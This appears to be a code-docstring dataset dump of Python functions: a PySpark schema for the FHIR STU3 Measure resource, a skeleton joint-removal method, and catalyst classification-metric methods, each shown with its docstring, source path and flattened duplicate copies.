spark_fhir_schemas.stu3.complex_types.codeableconcept import CodeableConceptSchema from spark_fhir_schemas.stu3.complex_types.contributor import ContributorSchema from spark_fhir_schemas.stu3.complex_types.contactdetail import ContactDetailSchema from spark_fhir_schemas.stu3.complex_types.relatedartifact import RelatedArtifactSchema from spark_fhir_schemas.stu3.complex_types.reference import ReferenceSchema from 
spark_fhir_schemas.stu3.complex_types.measure_group import Measure_GroupSchema from spark_fhir_schemas.stu3.complex_types.measure_supplementaldata import Measure_SupplementalDataSchema if ((max_recursion_limit and (nesting_list.count('Measure') >= max_recursion_limit)) or (max_nesting_depth and (nesting_depth >= max_nesting_depth))): return StructType([StructField('id', StringType(), True)]) my_nesting_list: List[str] = (nesting_list + ['Measure']) schema = StructType([StructField('id', StringType(), True), StructField('extension', ArrayType(ExtensionSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('meta', MetaSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('implicitRules', StringType(), True), StructField('language', StringType(), True), StructField('text', NarrativeSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('contained', ArrayType(ResourceListSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, 
max_extension_depth=max_extension_depth)), True), StructField('resourceType', StringType(), True), StructField('url', StringType(), True), StructField('identifier', ArrayType(IdentifierSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('version', StringType(), True), StructField('name', StringType(), True), StructField('title', StringType(), True), StructField('status', StringType(), True), StructField('experimental', BooleanType(), True), StructField('date', StringType(), True), StructField('publisher', StringType(), True), StructField('description', StringType(), True), StructField('purpose', StringType(), True), StructField('usage', StringType(), True), StructField('approvalDate', DateType(), True), StructField('lastReviewDate', DateType(), True), StructField('effectivePeriod', PeriodSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('useContext', ArrayType(UsageContextSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('jurisdiction', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, 
include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('topic', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('contributor', ArrayType(ContributorSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('contact', ArrayType(ContactDetailSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('copyright', StringType(), True), StructField('relatedArtifact', ArrayType(RelatedArtifactSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('library', ArrayType(ReferenceSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, 
max_extension_depth=max_extension_depth)), True), StructField('disclaimer', StringType(), True), StructField('scoring', CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('compositeScoring', CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('type', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('riskAdjustment', StringType(), True), StructField('rateAggregation', StringType(), True), StructField('rationale', StringType(), True), StructField('clinicalRecommendationStatement', StringType(), True), StructField('improvementNotation', StringType(), True), StructField('definition', ArrayType(StringType()), True), StructField('guidance', StringType(), True), StructField('set', StringType(), True), StructField('group', ArrayType(Measure_GroupSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('supplementalData', 
ArrayType(Measure_SupplementalDataSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True)]) if (not include_extension): schema.fields = [(c if (c.name != 'extension') else StructField('extension', StringType(), True)) for c in schema.fields] return schema<|docstring|>The Measure resource provides the definition of a quality measure. id: The logical id of the resource, as used in the URL for the resource. Once assigned, this value never changes. extension: May be used to represent additional information that is not part of the basic definition of the resource. In order to make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer is allowed to define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension. meta: The metadata about the resource. This is content that is maintained by the infrastructure. Changes to the content may not always be associated with version changes to the resource. implicitRules: A reference to a set of rules that were followed when the resource was constructed, and which must be understood when processing the content. language: The base language in which the resource is written. text: A human-readable narrative that contains a summary of the resource, and may be used to represent the content of the resource to a human. The narrative need not encode all the structured data, but is required to contain sufficient detail to make it "clinically safe" for a human to just read the narrative. Resource definitions may define what content should be represented in the narrative to ensure clinical safety. 
contained: These resources do not have an independent existence apart from the resource that contains them - they cannot be identified independently, and nor can they have their own independent transaction scope. resourceType: This is a Measure resource url: An absolute URI that is used to identify this measure when it is referenced in a specification, model, design or an instance. This SHALL be a URL, SHOULD be globally unique, and SHOULD be an address at which this measure is (or will be) published. The URL SHOULD include the major version of the measure. For more information see [Technical and Business Versions](resource.html#versions). identifier: A formal identifier that is used to identify this measure when it is represented in other formats, or referenced in a specification, model, design or an instance. version: The identifier that is used to identify this version of the measure when it is referenced in a specification, model, design or instance. This is an arbitrary value managed by the measure author and is not expected to be globally unique. For example, it might be a timestamp (e.g. yyyymmdd) if a managed version is not available. There is also no expectation that versions can be placed in a lexicographical sequence. To provide a version consistent with the Decision Support Service specification, use the format Major.Minor.Revision (e.g. 1.0.0). For more information on versioning knowledge assets, refer to the Decision Support Service specification. Note that a version is required for non-experimental active artifacts. name: A natural language name identifying the measure. This name should be usable as an identifier for the module by machine processing applications such as code generation. title: A short, descriptive, user-friendly title for the measure. status: The status of this measure. Enables tracking the life-cycle of the content. 
experimental: A boolean value to indicate that this measure is authored for testing purposes (or education/evaluation/marketing), and is not intended to be used for genuine usage. date: The date (and optionally time) when the measure was published. The date must change if and when the business version changes and it must change if the status code changes. In addition, it should change when the substantive content of the measure changes. publisher: The name of the individual or organization that published the measure. description: A free text natural language description of the measure from a consumer's perspective. purpose: Explaination of why this measure is needed and why it has been designed as it has. usage: A detailed description of how the measure is used from a clinical perspective. approvalDate: The date on which the resource content was approved by the publisher. Approval happens once when the content is officially approved for usage. lastReviewDate: The date on which the resource content was last reviewed. Review happens periodically after approval, but doesn't change the original approval date. effectivePeriod: The period during which the measure content was or is planned to be in active use. useContext: The content was developed with a focus and intent of supporting the contexts that are listed. These terms may be used to assist with indexing and searching for appropriate measure instances. jurisdiction: A legal or geographic region in which the measure is intended to be used. topic: Descriptive topics related to the content of the measure. Topics provide a high-level categorization of the type of the measure that can be useful for filtering and searching. contributor: A contributor to the content of the measure, including authors, editors, reviewers, and endorsers. contact: Contact details to assist a user in finding and communicating with the publisher. copyright: A copyright statement relating to the measure and/or its contents. 
Copyright statements are generally legal restrictions on the use and publishing of the measure. relatedArtifact: Related artifacts such as additional documentation, justification, or bibliographic references. library: A reference to a Library resource containing the formal logic used by the measure. disclaimer: Notices and disclaimers regarding the use of the measure, or related to intellectual property (such as code systems) referenced by the measure. scoring: Indicates how the calculation is performed for the measure, including proportion, ratio, continuous variable, and cohort. The value set is extensible, allowing additional measure scoring types to be represented. compositeScoring: If this is a composite measure, the scoring method used to combine the component measures to determine the composite score. type: Indicates whether the measure is used to examine a process, an outcome over time, a patient-reported outcome, or a structure measure such as utilization. riskAdjustment: A description of the risk adjustment factors that may impact the resulting score for the measure and how they may be accounted for when computing and reporting measure results. rateAggregation: Describes how to combine the information calculated, based on logic in each of several populations, into one summarized result. rationale: Provides a succint statement of the need for the measure. Usually includes statements pertaining to importance criterion: impact, gap in care, and evidence. clinicalRecommendationStatement: Provides a summary of relevant clinical guidelines or other clinical recommendations supporting the measure. improvementNotation: Information on whether an increase or decrease in score is the preferred result (e.g., a higher score indicates better quality OR a lower score indicates better quality OR quality is whthin a range). definition: Provides a description of an individual term used within the measure. 
guidance: Additional guidance for the measure including how it can be used in a clinical context, and the intent of the measure. set: The measure set, e.g. Preventive Care and Screening. group: A group of population criteria for the measure. supplementalData: The supplemental data criteria for the measure report, specified as either the name of a valid CQL expression within a referenced library, or a valid FHIR Resource Path.<|endoftext|>
e6bfd2aa7707cd9ee08e65aaac2c11c44de37c066f00f85d32c711e7a40150cc
def remove_joints(self, joints_to_remove):
    """Remove the joints specified in 'joints_to_remove'.

    Children of a removed joint are re-parented to their nearest surviving
    ancestor, and all joint indices (parents, left/right joint lists) are
    re-numbered to the compacted skeleton.

    Args:
        joints_to_remove: iterable of joint indices to drop.

    Returns:
        List of the kept joint indices, in the *original* numbering.
    """
    # Joints (original indices) that survive the removal.
    valid_joints = []
    for joint in range(len(self._parents)):
        if (joint not in joints_to_remove):
            valid_joints.append(joint)
    # Re-parent: walk up the hierarchy until the parent is a surviving joint.
    for i in range(len(self._parents)):
        while (self._parents[i] in joints_to_remove):
            self._parents[i] = self._parents[self._parents[i]]
    # index_offsets[j] = number of removed joints at or before j, i.e. how far
    # joint j's index shifts down in the compacted numbering.
    index_offsets = np.zeros(len(self._parents), dtype=int)
    new_parents = []
    for (i, parent) in enumerate(self._parents):
        if (i not in joints_to_remove):
            new_parents.append((parent - index_offsets[parent]))
        else:
            index_offsets[i:] += 1
    self._parents = np.array(new_parents)
    # Re-number the left/right symmetry lists with the same offsets,
    # dropping entries that were removed.
    if (self._joints_left is not None):
        new_joints_left = []
        for joint in self._joints_left:
            if (joint in valid_joints):
                new_joints_left.append((joint - index_offsets[joint]))
        self._joints_left = new_joints_left
    if (self._joints_right is not None):
        new_joints_right = []
        for joint in self._joints_right:
            if (joint in valid_joints):
                new_joints_right.append((joint - index_offsets[joint]))
        self._joints_right = new_joints_right
    # Derived metadata must be rebuilt after structural edits.
    self._compute_metadata()
    return valid_joints
Remove the joints specified in 'joints_to_remove'.
common/skeleton.py
remove_joints
fsImageries/video-to-pose3D
574
python
def remove_joints(self, joints_to_remove): "\n \n " valid_joints = [] for joint in range(len(self._parents)): if (joint not in joints_to_remove): valid_joints.append(joint) for i in range(len(self._parents)): while (self._parents[i] in joints_to_remove): self._parents[i] = self._parents[self._parents[i]] index_offsets = np.zeros(len(self._parents), dtype=int) new_parents = [] for (i, parent) in enumerate(self._parents): if (i not in joints_to_remove): new_parents.append((parent - index_offsets[parent])) else: index_offsets[i:] += 1 self._parents = np.array(new_parents) if (self._joints_left is not None): new_joints_left = [] for joint in self._joints_left: if (joint in valid_joints): new_joints_left.append((joint - index_offsets[joint])) self._joints_left = new_joints_left if (self._joints_right is not None): new_joints_right = [] for joint in self._joints_right: if (joint in valid_joints): new_joints_right.append((joint - index_offsets[joint])) self._joints_right = new_joints_right self._compute_metadata() return valid_joints
def remove_joints(self, joints_to_remove): "\n \n " valid_joints = [] for joint in range(len(self._parents)): if (joint not in joints_to_remove): valid_joints.append(joint) for i in range(len(self._parents)): while (self._parents[i] in joints_to_remove): self._parents[i] = self._parents[self._parents[i]] index_offsets = np.zeros(len(self._parents), dtype=int) new_parents = [] for (i, parent) in enumerate(self._parents): if (i not in joints_to_remove): new_parents.append((parent - index_offsets[parent])) else: index_offsets[i:] += 1 self._parents = np.array(new_parents) if (self._joints_left is not None): new_joints_left = [] for joint in self._joints_left: if (joint in valid_joints): new_joints_left.append((joint - index_offsets[joint])) self._joints_left = new_joints_left if (self._joints_right is not None): new_joints_right = [] for joint in self._joints_right: if (joint in valid_joints): new_joints_right.append((joint - index_offsets[joint])) self._joints_right = new_joints_right self._compute_metadata() return valid_joints<|docstring|>Remove the joints specified in 'joints_to_remove'.<|endoftext|>
d047aa01926c1c3745270ef7c52390cc56c7cb402c6cf054c9a0a85ff1817e24
def __init__(self, mode: str, num_classes: int=None, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None):
    """Initialize the statistics accumulator.

    Args:
        mode: one of 'binary', 'multiclass', 'multilabel'; selects the
            statistics function used for each batch.
        num_classes: number of classes (consumed by the 'multiclass' mode).
        compute_on_call: forwarded to the base metric.
        prefix: forwarded to the base metric.
        suffix: forwarded to the base metric.

    Raises:
        ValueError: if mode is incorrect
    """
    super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix)
    # Dispatch table: mode -> per-batch statistics function.
    statistics_fn_by_mode = {
        'binary': get_binary_statistics,
        'multiclass': partial(get_multiclass_statistics, num_classes=num_classes),
        'multilabel': get_multilabel_statistics,
    }
    if mode not in statistics_fn_by_mode:
        raise ValueError("Mode should be one of 'binary', 'multiclass', 'multilabel'")
    self.statistics_fn = statistics_fn_by_mode[mode]
    self.num_classes = num_classes
    self.statistics = None  # populated by ``reset`` below
    self._is_ddp = False
    self.reset()
Init params Raises: ValueError: if mode is incorrect
catalyst/metrics/_classification.py
__init__
ifixdocs/catalyst
1
python
def __init__(self, mode: str, num_classes: int=None, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): 'Init params\n\n Raises:\n ValueError: if mode is incorrect\n ' super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix) if (mode == 'binary'): self.statistics_fn = get_binary_statistics elif (mode == 'multiclass'): self.statistics_fn = partial(get_multiclass_statistics, num_classes=num_classes) elif (mode == 'multilabel'): self.statistics_fn = get_multilabel_statistics else: raise ValueError("Mode should be one of 'binary', 'multiclass', 'multilabel'") self.num_classes = num_classes self.statistics = None self._is_ddp = False self.reset()
def __init__(self, mode: str, num_classes: int=None, compute_on_call: bool=True, prefix: Optional[str]=None, suffix: Optional[str]=None): 'Init params\n\n Raises:\n ValueError: if mode is incorrect\n ' super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix) if (mode == 'binary'): self.statistics_fn = get_binary_statistics elif (mode == 'multiclass'): self.statistics_fn = partial(get_multiclass_statistics, num_classes=num_classes) elif (mode == 'multilabel'): self.statistics_fn = get_multilabel_statistics else: raise ValueError("Mode should be one of 'binary', 'multiclass', 'multilabel'") self.num_classes = num_classes self.statistics = None self._is_ddp = False self.reset()<|docstring|>Init params Raises: ValueError: if mode is incorrect<|endoftext|>
7b46a32be345e44faf0d1acf7929968c8d028ec441d219eaf542b2abfc189443
def reset(self) -> None:
    """Reset all the accumulated statistics and refresh the DDP flag."""
    # rank > -1 only when running under distributed training.
    self._is_ddp = get_rank() > (-1)
    # Fresh defaultdict: every statistic restarts from the factory value.
    self.statistics = defaultdict(self._mp_hack)
Reset all the statistics.
catalyst/metrics/_classification.py
reset
ifixdocs/catalyst
1
python
def reset(self) -> None: self.statistics = defaultdict(self._mp_hack) self._is_ddp = (get_rank() > (- 1))
def reset(self) -> None: self.statistics = defaultdict(self._mp_hack) self._is_ddp = (get_rank() > (- 1))<|docstring|>Reset all the statistics.<|endoftext|>
564448435b1560ba8d1e023f7207ec550cbb5717b5ab9418cba21a8ef695bead
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Union[(Tuple[(int, int, int, int, int)], Tuple[(Any, Any, Any, Any, Any)])]:
    """
    Compute statistics from outputs and targets, then fold the new values
    into the accumulated statistics.

    Args:
        outputs: prediction values
        targets: true answers

    Returns:
        Tuple of int or array: true negative, false positive, false
        negative, true positive and support statistics
    """
    batch_stats = self.statistics_fn(
        outputs=outputs.cpu().detach(), targets=targets.cpu().detach()
    )
    # Move every statistic off torch tensors onto numpy values.
    tn, fp, fn, tp, support = (value.numpy() for value in batch_stats)
    # Accumulate this batch into the running totals.
    for key, value in zip(('tn', 'fp', 'fn', 'tp', 'support'), (tn, fp, fn, tp, support)):
        self.statistics[key] += value
    return (tn, fp, fn, tp, support)
Compute statistics from outputs and targets, update accumulated statistics with new values. Args: outputs: prediction values targets: true answers Returns: Tuple of int or array: true negative, false positive, false negative, true positive and support statistics
catalyst/metrics/_classification.py
update
ifixdocs/catalyst
1
python
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Union[(Tuple[(int, int, int, int, int)], Tuple[(Any, Any, Any, Any, Any)])]: '\n Compute statistics from outputs and targets, update accumulated statistics with new values.\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n Tuple of int or array: true negative, false positive, false\n negative, true positive and support statistics\n ' (tn, fp, fn, tp, support) = self.statistics_fn(outputs=outputs.cpu().detach(), targets=targets.cpu().detach()) tn = tn.numpy() fp = fp.numpy() fn = fn.numpy() tp = tp.numpy() support = support.numpy() self.statistics['tn'] += tn self.statistics['fp'] += fp self.statistics['fn'] += fn self.statistics['tp'] += tp self.statistics['support'] += support return (tn, fp, fn, tp, support)
def update(self, outputs: torch.Tensor, targets: torch.Tensor) -> Union[(Tuple[(int, int, int, int, int)], Tuple[(Any, Any, Any, Any, Any)])]: '\n Compute statistics from outputs and targets, update accumulated statistics with new values.\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n Tuple of int or array: true negative, false positive, false\n negative, true positive and support statistics\n ' (tn, fp, fn, tp, support) = self.statistics_fn(outputs=outputs.cpu().detach(), targets=targets.cpu().detach()) tn = tn.numpy() fp = fp.numpy() fn = fn.numpy() tp = tp.numpy() support = support.numpy() self.statistics['tn'] += tn self.statistics['fp'] += fp self.statistics['fn'] += fn self.statistics['tp'] += tp self.statistics['support'] += support return (tn, fp, fn, tp, support)<|docstring|>Compute statistics from outputs and targets, update accumulated statistics with new values. Args: outputs: prediction values targets: true answers Returns: Tuple of int or array: true negative, false positive, false negative, true positive and support statistics<|endoftext|>
7d9951f4261277d170d9d116cb06b224195a25f9fcc0eaba92fc9cb660e24c14
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]:
    """
    Update statistics and return the intermediate result as a mapping.

    Args:
        outputs: prediction values
        targets: true answers

    Returns:
        dict of statistics for current input
    """
    tn, fp, fn, tp, support = self.update(outputs=outputs, targets=targets)
    # Keys are emitted in alphabetical order to match the compute() layout.
    return dict(zip(('fn', 'fp', 'support', 'tn', 'tp'), (fn, fp, support, tn, tp)))
Update statistics and return statistics intermediate result Args: outputs: prediction values targets: true answers Returns: dict of statistics for current input
catalyst/metrics/_classification.py
update_key_value
ifixdocs/catalyst
1
python
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return statistics intermediate result\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n dict of statistics for current input\n ' (tn, fp, fn, tp, support) = self.update(outputs=outputs, targets=targets) return {'fn': fn, 'fp': fp, 'support': support, 'tn': tn, 'tp': tp}
def update_key_value(self, outputs: torch.Tensor, targets: torch.Tensor) -> Dict[(str, float)]: '\n Update statistics and return statistics intermediate result\n\n Args:\n outputs: prediction values\n targets: true answers\n\n Returns:\n dict of statistics for current input\n ' (tn, fp, fn, tp, support) = self.update(outputs=outputs, targets=targets) return {'fn': fn, 'fp': fp, 'support': support, 'tn': tn, 'tp': tp}<|docstring|>Update statistics and return statistics intermediate result Args: outputs: prediction values targets: true answers Returns: dict of statistics for current input<|endoftext|>
50e8463a0148b36f3be23ca9927b56a37837df69614e4b1d1fddb75dad8521bb
def compute(self) -> Dict[(str, Union[(int, np.array)])]:
    """
    Return accumulated statistics.

    Returns:
        dict mapping statistic name ('tn', 'fp', 'fn', 'tp', 'support') to its
        accumulated value.
        NOTE(review): returned by reference, not copied — callers mutating the
        dict will affect the metric's internal state.
    """
    return self.statistics
Return accumulated statistics Returns: dict of statistics
catalyst/metrics/_classification.py
compute
ifixdocs/catalyst
1
python
def compute(self) -> Dict[(str, Union[(int, np.array)])]: '\n Return accumulated statistics\n\n Returns:\n dict of statistics\n ' return self.statistics
def compute(self) -> Dict[(str, Union[(int, np.array)])]: '\n Return accumulated statistics\n\n Returns:\n dict of statistics\n ' return self.statistics<|docstring|>Return accumulated statistics Returns: dict of statistics<|endoftext|>
422f1842bd91686aae09c0a297dea9fc6762a0b72aec253d593c819895e59787
def compute_key_value(self) -> Dict[(str, float)]:
    """
    Return accumulated statistics with keys in sorted order.

    Returns:
        dict of statistics

    Examples:
        binary mode: ``{"fn": 1, "fp": 4, "support": 13, "tn": 5, "tp": 3}``;
        other modes: per-class arrays, e.g. ``{"tp": np.array([1, 2, 1]), ...}``
    """
    accumulated = self.compute()
    # dict(sorted(...)) keeps the alphabetical key order of the original.
    return dict(sorted(accumulated.items()))
Return accumulated statistics Returns: dict of statistics Examples: >>> For binary mode: {"tp": 3, "fp": 4, "tn": 5, "fn": 1, "support": 13} >>> For other modes: {"tp": np.array([1, 2, 1]), "fp": np.array([2, 1, 0]), ...}
catalyst/metrics/_classification.py
compute_key_value
ifixdocs/catalyst
1
python
def compute_key_value(self) -> Dict[(str, float)]: '\n Return accumulated statistics\n\n Returns:\n dict of statistics\n\n Examples:\n >>> For binary mode: {"tp": 3, "fp": 4, "tn": 5, "fn": 1, "support": 13}\n >>> For other modes: {"tp": np.array([1, 2, 1]), "fp": np.array([2, 1, 0]), ...}\n ' result = self.compute() return {k: result[k] for k in sorted(result.keys())}
def compute_key_value(self) -> Dict[(str, float)]: '\n Return accumulated statistics\n\n Returns:\n dict of statistics\n\n Examples:\n >>> For binary mode: {"tp": 3, "fp": 4, "tn": 5, "fn": 1, "support": 13}\n >>> For other modes: {"tp": np.array([1, 2, 1]), "fp": np.array([2, 1, 0]), ...}\n ' result = self.compute() return {k: result[k] for k in sorted(result.keys())}<|docstring|>Return accumulated statistics Returns: dict of statistics Examples: >>> For binary mode: {"tp": 3, "fp": 4, "tn": 5, "fn": 1, "support": 13} >>> For other modes: {"tp": np.array([1, 2, 1]), "fp": np.array([2, 1, 0]), ...}<|endoftext|>
e40f39ae5802ff939bc67c88e399b88f659c025f41ceb66aff0b8c906dd415fb
def __init__(self, mode: str, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: str=None, suffix: str=None) -> None:
    """Initialize a PrecisionRecallF1SupportMetric instance.

    Args:
        mode: one of 'binary', 'multiclass', 'multilabel' (forwarded to base).
        num_classes: number of classes (forwarded to base).
        zero_division: value reported when a metric denominator is zero.
        compute_on_call: forwarded to the base metric.
        prefix: forwarded to the base metric.
        suffix: forwarded to the base metric.
    """
    super().__init__(
        mode=mode,
        num_classes=num_classes,
        compute_on_call=compute_on_call,
        prefix=prefix,
        suffix=suffix,
    )
    self.zero_division = zero_division
    self.reset()
Init PrecisionRecallF1SupportMetric instance
catalyst/metrics/_classification.py
__init__
ifixdocs/catalyst
1
python
def __init__(self, mode: str, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: str=None, suffix: str=None) -> None: super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, mode=mode) self.zero_division = zero_division self.reset()
def __init__(self, mode: str, num_classes: int=None, zero_division: int=0, compute_on_call: bool=True, prefix: str=None, suffix: str=None) -> None: super().__init__(compute_on_call=compute_on_call, prefix=prefix, suffix=suffix, num_classes=num_classes, mode=mode) self.zero_division = zero_division self.reset()<|docstring|>Init PrecisionRecallF1SupportMetric instance<|endoftext|>
7ca6b6365085c465ada420aaa1bd9c26c3813894117ad141d3130a39aa9eed98
def _convert_metrics_to_kv(self, per_class, micro, macro, weighted) -> Dict[(str, float)]: '\n Convert metrics aggregation to key-value format\n\n Args:\n per_class: per-class metrics, array of shape (4, self.num_classes)\n of precision, recall, f1 and support metrics\n micro: micro averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n macro: macro averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n weighted: weighted averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n\n Returns:\n dict of key-value metrics\n ' kv_metrics = {} for (aggregation_name, aggregated_metrics) in zip(('micro', 'macro', 'weighted'), (micro, macro, weighted)): metrics = {f'{metric_name}/{aggregation_name}': metric_value for (metric_name, metric_value) in zip(('precision', 'recall', 'f1'), aggregated_metrics[:(- 1)])} kv_metrics.update(metrics) per_class_metrics = {f'{metric_name}/class_{i:02d}': metric_value[i] for (metric_name, metric_value) in zip(('precision', 'recall', 'f1', 'support'), per_class) for i in range(self.num_classes)} kv_metrics.update(per_class_metrics) return kv_metrics
Convert metrics aggregation to key-value format Args: per_class: per-class metrics, array of shape (4, self.num_classes) of precision, recall, f1 and support metrics micro: micro averaged metrics, array of shape (self.num_classes) of precision, recall, f1 and support metrics macro: macro averaged metrics, array of shape (self.num_classes) of precision, recall, f1 and support metrics weighted: weighted averaged metrics, array of shape (self.num_classes) of precision, recall, f1 and support metrics Returns: dict of key-value metrics
catalyst/metrics/_classification.py
_convert_metrics_to_kv
ifixdocs/catalyst
1
python
def _convert_metrics_to_kv(self, per_class, micro, macro, weighted) -> Dict[(str, float)]: '\n Convert metrics aggregation to key-value format\n\n Args:\n per_class: per-class metrics, array of shape (4, self.num_classes)\n of precision, recall, f1 and support metrics\n micro: micro averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n macro: macro averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n weighted: weighted averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n\n Returns:\n dict of key-value metrics\n ' kv_metrics = {} for (aggregation_name, aggregated_metrics) in zip(('micro', 'macro', 'weighted'), (micro, macro, weighted)): metrics = {f'{metric_name}/{aggregation_name}': metric_value for (metric_name, metric_value) in zip(('precision', 'recall', 'f1'), aggregated_metrics[:(- 1)])} kv_metrics.update(metrics) per_class_metrics = {f'{metric_name}/class_{i:02d}': metric_value[i] for (metric_name, metric_value) in zip(('precision', 'recall', 'f1', 'support'), per_class) for i in range(self.num_classes)} kv_metrics.update(per_class_metrics) return kv_metrics
def _convert_metrics_to_kv(self, per_class, micro, macro, weighted) -> Dict[(str, float)]: '\n Convert metrics aggregation to key-value format\n\n Args:\n per_class: per-class metrics, array of shape (4, self.num_classes)\n of precision, recall, f1 and support metrics\n micro: micro averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n macro: macro averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n weighted: weighted averaged metrics, array of shape (self.num_classes)\n of precision, recall, f1 and support metrics\n\n Returns:\n dict of key-value metrics\n ' kv_metrics = {} for (aggregation_name, aggregated_metrics) in zip(('micro', 'macro', 'weighted'), (micro, macro, weighted)): metrics = {f'{metric_name}/{aggregation_name}': metric_value for (metric_name, metric_value) in zip(('precision', 'recall', 'f1'), aggregated_metrics[:(- 1)])} kv_metrics.update(metrics) per_class_metrics = {f'{metric_name}/class_{i:02d}': metric_value[i] for (metric_name, metric_value) in zip(('precision', 'recall', 'f1', 'support'), per_class) for i in range(self.num_classes)} kv_metrics.update(per_class_metrics) return kv_metrics<|docstring|>Convert metrics aggregation to key-value format Args: 